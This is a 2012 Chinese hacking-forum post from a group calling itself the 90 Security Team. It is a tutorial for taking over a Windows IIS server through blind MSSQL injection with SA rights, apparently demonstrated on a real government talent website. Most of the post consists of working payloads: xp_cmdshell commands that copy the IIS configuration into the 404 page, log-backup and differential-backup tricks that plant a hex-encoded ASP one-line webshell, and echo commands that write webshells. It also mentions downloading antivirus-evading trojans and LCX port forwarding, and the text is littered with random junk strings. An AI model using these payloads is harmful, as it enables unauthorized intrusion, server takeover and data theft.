找回密码
 立即注册
查看: 2877|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————' i7 x  K' d* h
& {! }/ @1 ^5 E+ N

  R) J  h# j: K. K# \8 r  ?                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
9 G2 w( k0 R% g5 L) Q/ a1 F2 _7 a, a3 j+ x  [: R1 ?- o
                                                                 
/ E. N# z" V2 q+ I# S                                                                 . J! h) v4 C% s2 `
                                                                  论坛: http://www.90team.net/
- V9 I6 D3 p, A/ z5 k1 Q$ R" C$ U2 q: G3 [, E7 }1 O

: u) o9 N' d6 J* u% t" V/ f" f8 W" b. C4 a" M/ }. r. m
友情检测国家人才网* U$ b- C& E. o# ^4 I
& d, ^5 b* P: i1 l  r" E
3 u9 B$ u* V/ w) k0 [3 t) `, f
内容:MSSQL注入SA权限不显错模式下的入侵
2 b% m! j  k; x
( D8 U4 w7 [$ n& {/ U" l
9 M0 u; _) m, }" L; `3 h9 a2 n/ u一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。; d2 @7 R) X( l! J/ J
( s, W' b0 x7 X. D+ R& L
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。) f+ X/ E; a, P7 _- P" o
% J9 T5 _) ^% ^0 S/ b! j
; C5 ~5 I$ F# P  [! v
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
8 t" s  ^- d' J6 C9 y1 O: G- s3 v$ X8 S5 [' o( a
思路:! S5 \3 `$ r6 [, r% o: _" I& R

& ~% B! x# H4 s/ q0 v) ]1 U& A首先:
2 ?" D$ L; A. i& E/ w. W% w' M) Z& o
, A* ?/ m: K. ^( Y; T! O通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
: @) i8 b9 ?& d+ z9 k( I
; q/ l7 |+ }: l! N1.日志备份获得Webshell
2 }/ ?( j0 a! ?4 c
9 c" {7 K" Z% R" ]! u, G6 E: g2.数据库差异备份获得Webshell
) v4 n. D2 h) Z; p& B! q2 q, }, u" \7 B; [* P7 H2 G4 J; Y
4.直接下载免杀远控木马。  o) H5 q& M/ G

0 f$ Z( O, f% `* c. T* U- f5.直接下载LCX将服务器端口转发出来
0 t% w/ A: Q8 p# y( |- Z
, p8 O/ R5 z: O( R5 T: @) B6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
4 a: K0 i' c% B' l* _9 Y
* e7 R6 u# @" W4 }2 [* Z
3 U. W3 z: H" S! j6 ]# F5 r$ t) f
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 3 l6 x- K5 }2 I  B

$ n) ~# p' Y$ ]我直接演示后面一个方法7 v: ~. W0 j4 p& z: b: p' R

/ Q) {- a% h. w/ _, t) a1 \2 }: }) ~! \$ \
分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL 5 P  t  U8 Y  Y; [" H5 h4 Q

5 k3 \, x$ E" R% k5 Z( `0 z) E  w; W' F# L+ [( f# t
+ z1 R. B1 A+ v7 S6 U% R5 b, J) l

. ]' r7 w) J3 H/ i+ `. r◆日志备份:
; b  V5 X- e& L7 T, j0 M
; ]" O1 K/ w3 ^6 P) N& I) E
  _& `& s7 z) p0 T5 l4 Z1. 进行初始备份
5 U' f( n" W6 a5 u3 x9 Q; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
! e1 H0 F+ ]# _( u! L/ {2 ?9 f
) z+ G7 c5 X, K' E) H& z2. 插入数据, j$ x9 [7 {- E2 d& r
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--* m( ]6 ~- }% Y8 w8 V
* P; f. A  e* I$ ^1 }9 T( ~" J. g
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
8 R/ `* y) q/ ?* x7 Y( _& s  2 e* U! }+ X. C6 O/ K
3. 备份并获得文件,删除临时表5 {" H2 M- m- g' m, |
;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--! @' e0 y4 ^' c( ^  q
/ l8 l$ G  t! u4 s

  Q5 T; f7 d0 m5 l4 M+ z4 O  ^' k2 m5 F" x- s5 D
◆数据库差异备份
0 V$ f5 e6 E3 B
& j; o% h2 ~! ~. Z9 _2 W(1. 进行差异备份准备工作
" _' }$ r5 h9 i( ?8 a, Y& ~$ @/ l& ~9 W
6 H& c# n; ]; `;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--' Z1 o- E+ s) ^' \6 @" d0 i
7 d) o( g( h& ]: x
上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码7 @0 D6 J4 [9 ^3 F9 J7 k4 t1 T

4 x8 _# u/ [, Z) Y& T* v8 @: `: w
/ q+ m4 \9 x1 V7 M3 h: z# V(2. 将数据写入到数据库% ^& Q" {% {2 N
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)-- / \2 x. Y, v- P' b

! ]4 Z$ f, G8 J- ]0 d" l; e0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>
' o+ U8 o5 H; T+ V0 g  j! ~$ B, z& Q0 i
3. 备份数据库并清理临时文件
/ _$ d1 R# p' O' u! \+ u/ T; q) h# f  t9 ^$ g2 ~& z# @4 h1 x4 v) L- D
;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--6 c) J' `* P6 a- Q

# }& p% j, F& Y; `5 L; y0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 ! |4 y6 u  a# A4 N- ]# U
& \7 K2 G& I. m  C+ E

. e) o. U; r) w$ l% F, T- t: B; C1 X( [) S5 n- j
用^转义字符来写ASP(一句话木马)文件的方法:   
( V$ i$ ~4 V  N: S# s" ?7 \( @" P& a0 j5 T0 @8 i. v% H: a
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--
% `# R; v; D9 j3 z1 q4 }9 E' O: I6 ~" h
2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
% k# q% B, p6 c$ \. m6 r
, E7 T' x9 M& r! y7 y7 S4 W/ b读取IIS配置信息获取web路径" x2 a  f7 ^$ ]

9 o+ k: S! j& E2 w9 r3 F     
& c9 `6 m$ k- x& p9 \( y: B     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
5 I: y! I- m9 ^) d3 l: K+ W5 L9 x" C8 @: b+ g; J
执行命令7 D: n4 ]' r/ ^& c0 _, K/ c* v
     $ m* p  k/ ^- R. x8 H3 D
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--( \* M5 w% ~  G2 K

7 @: b- X' T4 D2 B5 z7 s
% z4 o' M4 J; z% Z# B3 b. C/ a6 R: H& I( G6 p0 |

( ]" m) ~5 k8 b/ ]6 Y: Z$ N6 v. Z4 z7 ^0 ~
8 P' [7 }/ S3 A, U. M- c

" m) i- {3 ^- ]1 p. F1 ?0 f, d$ \; K7 |% d7 l
9 G, L& r5 h  ^" P9 I/ b0 b1 b

# }- X: A/ E; \: [6 z, s4 T' I& x" Q1 w: ]/ X1 M

/ E) W. e' L! i5 r2 b$ r: u- O1 \% z1 {( f% B

# B  z( g, A/ e4 I4 u) v- a$ q, X, Y2 {- D5 R& ?
7 U# M* p9 s6 k

, o6 }8 {% d. V; K* H8 b+ F& }( ^/ ~
' S! y1 u& G0 u2 e) {8 X
9 O8 G5 h; X& Y6 H

1 a" @' r# K$ P2 Q! s
7 G, _( B  Q9 w1 k0 ]$ [
5 O7 q; s* e6 m- U8 f; k' w/ [: l  @" [' y4 w4 g
3 M6 B4 \! q9 J+ s

# e1 G1 o/ q) ~! z' x+ g
) {* {) f; d: ?: M" X: H; h! I9 i8 h5 }1 o$ k. |$ J

8 _5 _; w$ p) k' Z+ \8 q0 h
3 f9 r: g: D- k3 `" m  s3 i! ^& M) p2 T* |8 D, l
! S' I; g" O/ m! @5 {6 \& J$ @

+ M+ Y  ~3 k! ^5 F: {) X: w; h# Y! y) R4 Q

; p2 V1 F# ~0 s0 E& H2 S
1 M& e7 H9 Z6 p# l4 T* Y2 c6 X' f" B+ m! A7 ^( ~
, R4 b5 x+ K% z8 v" F7 W% ~

8 K4 x2 c( p& v
, u/ V  i/ }4 V! u0 m/ f$ E! ^3 P5 K

2 y' d, d6 B% V1 T+ r$ T: O( @, _3 n4 L, ~4 T, H
+ Z( B5 \* r% b4 O, m& P

- K1 E4 m; Z5 d- }
1 \/ `7 K2 L: n! A3 k# H) d' L8 ]( A! V9 ?4 _

0 o# p! f' I: ~6 a
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表